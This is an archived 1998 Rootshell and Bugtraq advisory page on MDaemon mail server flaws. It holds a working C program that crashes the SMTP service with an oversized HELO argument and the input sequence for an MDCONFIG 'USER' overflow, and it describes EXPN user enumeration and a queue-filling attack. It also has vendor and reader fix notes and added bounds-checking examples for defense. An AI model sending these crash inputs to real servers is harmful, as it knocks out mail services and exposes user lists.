/*
 * MDaemon SMTP server for Windows buffer overflow exploit
 *
 * http://www.mdaemon.com - if you dare...
 *
 * Tested on MDaemon 2.71 SP1
 *
 * http://www.rootshell.com/
 *
 * Released 3/10/98
 *
 * (C) 1998 Rootshell All Rights Reserved
 *
 * For educational use only.  Distribute freely.
 *
 * Note: This exploit will also crash the Microsoft Exchange SMTP mail
 *       connector if SP2 has NOT been installed.
 *
 * Danger!
 *
 * A malicious user could use this bug to execute arbitrary code on the
 * remote system.
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>   /* bzero(), bcopy() */
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock, i;

  if (argc != 2) {
    printf("usage: %s <smtp server>\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp == NULL) {
    printf("Unknown host: %s\n", argv[1]);
    exit(1);
  }
  bzero((char *) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0) {
    perror("socket");
    exit(1);
  }
  if (connect(sock, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
    perror("connect");
    exit(1);
  }
  /* "HELO " followed by 4096 'x' characters and CRLF: a command
     argument far longer than the server's fixed-size buffer. */
  buffer = (char *) malloc(10000);
  if (buffer == NULL) {
    perror("malloc");
    exit(1);
  }
  sprintf(buffer, "HELO ");
  for (i = 0; i < 4096; i++)
    strcat(buffer, "x");
  strcat(buffer, "\r\n");
  write(sock, buffer, strlen(buffer));
  close(sock);
  free(buffer);
  return 0;
}

-- cut here --

Rootshell note: The config manager appears to run on port 8081.

Date:         Wed, 11 Mar 1998 05:33:53 +0100
From:         Alvaro Martinez Echevarria <alvaro-bugtraq@LANDER.ES>
Subject:      DoS (and possibly more) on MDaemon for NT/95

Hi there.

Around a month ago I sent the following message to
sales@mdaemon.com.  In a few words: there's a security problem in
the SMTP/POP/WebPop software they provide for evaluation (and
probably also in the commercial version they sell, see
www.mdaemon.com) that lets you kill SMTP and POP services,
provided that you can connect to a sort of configuration port the
programs use (in the configuration I tested, the port was N+1, for
N being the port used by WebPop). My knowledge of Windoze
asymptotically approaches zero, so I cannot give many more
details. I haven't received any interesting message from
@mdaemon.com, apart from "we'll forward this information to our
developers" (?); and I've seen nothing related to this security
problem on their web site so far, so the time has come to post to
bugtraq, I guess. Possible workaround: block that port using a
firewall. Just in case anyone out there is crazy enough to use
this thing ;-).

Regards.

.------------------------------------------------------------------.
|   Alvaro Martínez Echevarría   |      LANDER SISTEMAS            |
|        alvaro@lander.es        |      Pº Castellana, 121         |
--------------------------------|      28046 Madrid, SPAIN        |
                                 |      Tel: +34-1-5562883         |
                                 |      Fax: +34-1-5563001         |
                                 ---------------------------------'
---------- Forwarded message ----------
From: Alvaro Martinez Echevarria <alvaro@lander.es>
To: sales@mdaemon.com
Date: Sun, 15 Feb 1998 19:59:03 +0100 (CET)
Subject: DoS attack on MDaemon

Hi there.
I have found a really easy-to-use DoS attack on your MDaemon
server, which some people here in my company have been evaluating.
They asked me to take a look at the security of the product, and
the very first thing I tried just brought the SMTP/POP services down.
It was easy: I connected to a port whose greeting says "+OK
xxx.xxx MDCONFIG Interface Ready", and after some trial and
error this is what I found:

VERS 3.0
+OK MDConfig v3.0 acceptable.
USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]

The "a" here needs to be repeated a lot of times, say 2000. And
after that, voilà: "Connection closed by foreign host", and the
SMTP and POP services die. As you should know, this same bug
could be used in a more clever way to execute arbitrary code on
any server that is using your MDaemon software. I think you
should correct this problem right away, and pay more attention
to bounds checking in your future development.
Regards.
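
Both reports on this page have the same root cause: a command argument (the HELO parameter in the Rootshell program above, the MDCONFIG USER parameter in the forwarded message) is copied into a fixed-size buffer with no length check. The following is an added example of the bounds-checked parsing that Alvaro asks for; it is not MDaemon's code and not code from the original posts. The limits (512 octets per command line, 255 per argument) are the RFC 821 figures and are an assumption of this example; the helper names `parse_command`, `helo_host` and `helo_with_n_x` are made up for it.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Limits assumed for this example: RFC 821 caps an SMTP command line at
 * 512 octets including CRLF, and a domain name at 255 octets. */
#define MAX_LINE 512
#define MAX_ARG  255

enum parse_result {
    PARSE_OK = 0,
    PARSE_LINE_TOO_LONG,  /* more than MAX_LINE octets: dropped before parsing */
    PARSE_NO_CRLF,        /* not a complete command line */
    PARSE_BAD_VERB,       /* not the command we were asked to parse */
    PARSE_ARG_EMPTY,
    PARSE_ARG_TOO_LONG    /* argument would not fit the destination buffer */
};

/* Copy the argument of one "<VERB> <arg>\r\n" line into arg[argsz].
 * Every index is checked against linelen and the copy happens only after
 * the argument is known to fit.  The unsafe pattern this replaces is
 * strcpy()/strcat() of the raw line into a fixed-size stack buffer. */
enum parse_result parse_command(const char *line, size_t linelen,
                                const char *verb, char *arg, size_t argsz)
{
    size_t verblen = strlen(verb), i, start, end;

    if (linelen > MAX_LINE)
        return PARSE_LINE_TOO_LONG;
    if (linelen < 2 || line[linelen - 2] != '\r' || line[linelen - 1] != '\n')
        return PARSE_NO_CRLF;
    end = linelen - 2;                      /* index of CR: end of content */
    if (end < verblen)
        return PARSE_BAD_VERB;
    for (i = 0; i < verblen; i++)
        if (toupper((unsigned char)line[i]) != toupper((unsigned char)verb[i]))
            return PARSE_BAD_VERB;
    if (i < end && line[i] != ' ')          /* "HELOX" is not "HELO" */
        return PARSE_BAD_VERB;
    start = i;
    while (start < end && line[start] == ' ')
        start++;
    while (end > start && line[end - 1] == ' ')
        end--;
    if (end == start)
        return PARSE_ARG_EMPTY;
    if (end - start > MAX_ARG || end - start >= argsz)
        return PARSE_ARG_TOO_LONG;
    memcpy(arg, line + start, end - start);
    arg[end - start] = '\0';
    return PARSE_OK;
}

/* Convenience wrapper for HELO: returns the parsed hostname (in a static
 * buffer) or NULL when the line was rejected for any reason. */
const char *helo_host(const char *line)
{
    static char host[MAX_ARG + 1];
    if (parse_command(line, strlen(line), "HELO", host, sizeof host) != PARSE_OK)
        return NULL;
    return host;
}

/* Feed the parser the same shape of input the Rootshell program sends:
 * "HELO " followed by n 'x' characters and CRLF, constructed in memory. */
enum parse_result helo_with_n_x(size_t n)
{
    static char line[8192];
    char host[MAX_ARG + 1];
    if (n > sizeof line - 7)
        n = sizeof line - 7;
    memcpy(line, "HELO ", 5);
    memset(line + 5, 'x', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return parse_command(line, 5 + n + 2, "HELO", host, sizeof host);
}

int main(void)
{
    const char *h = helo_host("HELO mail.example.com\r\n");
    printf("normal HELO: %s\n", h ? h : "(rejected)");
    printf("HELO with 4096 x: result %d\n", (int)helo_with_n_x(4096));
    printf("HELO with 300 x:  result %d\n", (int)helo_with_n_x(300));
    return 0;
}
```

The order of the checks matters: the total line length is tested before any character is examined, so the 4096-byte line is discarded as a whole, and the argument length is tested against both the protocol limit and the actual destination size before `memcpy` runs. The same function serves the MDCONFIG case by calling it with `"USER"` as the verb.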

--------------------------------------------------------------------

Date: Sat, 07 Mar 1998 01:05:23 +0000
To: info@rootshell.com
Subject: Alt-Mdaemon (more thingys)

Hrmm, I have a 3-computer LAN at my residence: one NT workstation box
(main web server, firewall, FTP etc.), a Windows 95 box (mail server,
general stupid things), and a Linux box (just have it around for the
funk of it). The mail server runs MDaemon. This is not really the first of
these exploits though, and I know for a fact this guy did not come up with
it. I have been using this product for well over a month now, and a
couple of weeks ago I made a rather large post to
http://www.deerfield.net/forums/Index.cfm?CFApp=50
about different bugs that could be detrimental to email servers. One was
this attack; there are three others that are not documented.

Quick fix for the First DoS attack
--

Most of the time, you won't get hundreds of people attacking your server;
usually it's just one guy doing this just to be cool and say he can do
something. All you really have to do is look back at your logs (which it
keeps good track of) and use the IP Screening feature on the server to
block all incoming connections from *.33.33.33.3. He will be immediately
disconnected from the server upon connection.

Getting a listing of every single user on an mdaemon server
-------

Simply put, this is a default setting that most sysadmins overlook when
they use the program, but by default every time the admin makes a new
account it gets added to an email list called EVERYONE
(everyone@blah.com). Now when you telnet to an MDaemon server's SMTP port
you receive the norm, but type in the regular command EXPN and you get a
very weird message, for example

EXPN suzy
No such mailing list

Now since that default list EVERYONE is there, all we have to do is an
EXPN Everyone
and we get a full listing of their users.

Simple fix? Delete everyone from the EVERYONE mailing list, make a new
mailing list, i.e. everyone5, or use the HIDE from EXPN feature.

Anti-spam with Mdaemon? I think not
----
Nope, no anti-spam thingys... feel free to send anonymous email via an
MDaemon server!

Slowly but surely fill up a hard drive (another DoS)
---
If you send email from an unknown user on an MDaemon server, i.e.
fjkdals@mdaemonserver.com, to the same address, i.e.
fjkdals@mdaemonserver.com, for some reason the message will queue and
requeue over and over again. I haven't looked into this one as much as the
others, but oh well; simple fix: delete the requeuing message from the hard
drive.

Hope this helps some of the readers
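
The three configuration-level problems in the post above (EXPN revealing the EVERYONE list, anonymous relaying, and the queue loop for mail from a non-existent local user to itself) can all be decided before a message touches the queue. The following is an added example of such an envelope and EXPN policy written for this page; it is not MDaemon's code or its configuration format. The domain `example.com`, the hosts under `remote.test`, the account names, the list table and the function names `expn_policy` and `mail_policy` are all constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strcasecmp (POSIX) */

/* Constructed directory for a hypothetical server: one local domain,
 * three accounts, two mailing lists. */
static const char *LOCAL_DOMAIN = "example.com";
static const char *LOCAL_USERS[] = { "suzy", "bob", "postmaster" };

struct mlist {
    const char *name;
    int hidden_from_expn;   /* the "hide from EXPN" setting the post recommends */
};
static const struct mlist LISTS[] = {
    { "everyone", 1 },      /* auto-populated all-users list: never expandable */
    { "announce", 0 },
};

#define COUNT(a) (sizeof(a) / sizeof((a)[0]))

/* Split "local@domain" into its parts; returns 0 for a malformed address. */
static int split_addr(const char *addr, char *local, size_t lsz, const char **domain)
{
    const char *at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || (size_t)(at - addr) >= lsz)
        return 0;
    memcpy(local, addr, at - addr);
    local[at - addr] = '\0';
    *domain = at + 1;
    return 1;
}

static int is_local_user(const char *local)
{
    size_t i;
    for (i = 0; i < COUNT(LOCAL_USERS); i++)
        if (strcasecmp(local, LOCAL_USERS[i]) == 0)
            return 1;
    return 0;
}

static const struct mlist *find_list(const char *name)
{
    size_t i;
    for (i = 0; i < COUNT(LISTS); i++)
        if (strcasecmp(name, LISTS[i].name) == 0)
            return &LISTS[i];
    return NULL;
}

enum expn_verdict { EXPN_ALLOWED, EXPN_NO_SUCH_LIST };

/* EXPN policy: a hidden list gets exactly the reply an unknown name gets,
 * so the command cannot even confirm that the all-users list exists. */
enum expn_verdict expn_policy(const char *name)
{
    const struct mlist *l = find_list(name);
    if (l == NULL || l->hidden_from_expn)
        return EXPN_NO_SUCH_LIST;
    return EXPN_ALLOWED;
}

enum mail_verdict {
    MAIL_ACCEPT,
    MAIL_REJECT_MALFORMED,
    MAIL_REJECT_UNKNOWN_LOCAL_SENDER,  /* claims our domain, no such account */
    MAIL_REJECT_UNKNOWN_RECIPIENT,     /* refused at RCPT: nothing is queued */
    MAIL_REJECT_RELAY                  /* outside -> outside: no open relay */
};

/* Envelope policy evaluated before anything is written to the queue.
 * peer_is_internal is 1 when the client connected from the LAN; that is
 * the only case in which mail for a foreign domain is accepted. */
enum mail_verdict mail_policy(const char *from, const char *to, int peer_is_internal)
{
    char flocal[64], tlocal[64];
    const char *fdom, *tdom;
    int from_local_dom, to_local_dom;

    if (!split_addr(from, flocal, sizeof flocal, &fdom) ||
        !split_addr(to, tlocal, sizeof tlocal, &tdom))
        return MAIL_REJECT_MALFORMED;
    from_local_dom = strcasecmp(fdom, LOCAL_DOMAIN) == 0;
    to_local_dom = strcasecmp(tdom, LOCAL_DOMAIN) == 0;

    if (from_local_dom && !is_local_user(flocal))
        return MAIL_REJECT_UNKNOWN_LOCAL_SENDER;
    if (to_local_dom && !is_local_user(tlocal) && find_list(tlocal) == NULL)
        return MAIL_REJECT_UNKNOWN_RECIPIENT;
    if (!to_local_dom && !peer_is_internal)
        return MAIL_REJECT_RELAY;
    return MAIL_ACCEPT;
}

int main(void)
{
    printf("EXPN everyone -> %s\n",
           expn_policy("everyone") == EXPN_ALLOWED ? "allowed" : "No such mailing list");
    printf("fjkdals -> fjkdals: verdict %d\n",
           (int)mail_policy("fjkdals@example.com", "fjkdals@example.com", 0));
    printf("outside -> outside: verdict %d\n",
           (int)mail_policy("alice@remote.test", "bob@remote.test", 0));
    return 0;
}
```

The self-addressed message from a non-existent account is rejected at the envelope stage, so there is nothing to queue and requeue; a hidden list and an unknown name produce the identical EXPN reply; and a recipient outside the local domain is accepted only from an internal peer. The address splitter bounds its copy against the destination size, in keeping with the rest of this page.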

--------------------------------------------------------------------

Date:         Thu, 12 Mar 1998 12:02:42 -0600
From:         Development Team <development@ALTN.COM>
Subject:      Problems with MDaemon 2.7.1

Greetings!

This is Arvel Hathcock the author of MDaemon.  I just wanted to thank the
manager and membership of this mailing list for providing a valuable
service in pointing out bugs in our software.

The problem mentioned earlier to the list about SMTP buffer overruns was
reported to me in Feb.  That very same day I fixed this problem for what we
call "Service/Update Pack 2" and sent it to our beta test team members.
Service/Update Pack 2 for MDaemon 2.7 will be publicly available at
www.mdaemon.com TODAY - this afternoon or evening.

We move quickly when errors such as these are reported to us.  I don't
pretend to have flawlessly perfect software but I do know that an error
only needs to be reported to me one time and then I get it fixed fast - our
customers can vouch for that.

Anyway, just wanted to thank you all for pointing out this error.  The more
sources of information I can get on errors the happier I am and the quicker
I can fix things.

Thanks again!

Arvel Hathcock
Alt-N Technologies

